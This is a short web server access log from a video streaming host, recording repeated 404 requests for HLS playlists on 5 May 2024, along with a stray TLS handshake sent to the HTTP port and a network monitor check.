95.129.46.151 - - [05/May/2024:04:10:46 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:04:10:49 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:04:10:57 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:04:10:59 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
62.210.125.163 - - [05/May/2024:04:11:02 -0400] "GET /ALBANIANTVUSA/index.m3u8 HTTP/1.1" 404 222 "-" "AppleCoreMedia/1.0.0.9A405 (iPad; U; CPU OS 5_0_1 like Mac OS X; zh_cn)" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:04:11:08 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:04:11:10 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
102.50.247.178 - - [05/May/2024:04:11:10 -0400] "GET /Cusco/index.m3u8 HTTP/1.1" 404 214 "-" "Mozilla/5.0" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:04:11:19 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:04:11:21 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
45.33.63.173 - - [05/May/2024:04:11:27 -0400] "\x16\x03\x01" 400 226 "-" "-" "-"
95.129.46.151 - - [05/May/2024:04:11:29 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:04:11:32 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:04:11:40 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
154.57.7.9 - - [05/May/2024:04:11:42 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
162.212.176.104 - - [05/May/2024:04:11:45 -0400] "GET /crossdomain.xml HTTP/1.1" 200 296 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)" "tna5.bozztv.com"
95.129.46.151 - - [05/May/2024:04:11:51 -0400] "GET /aigaiotv1/index.m3u8 HTTP/1.1" 404 218 "https://ssh101.com/securelive/index.php?id=aigaiotv1" "Lavf/58.45.100" "tna5.bozztv.com"
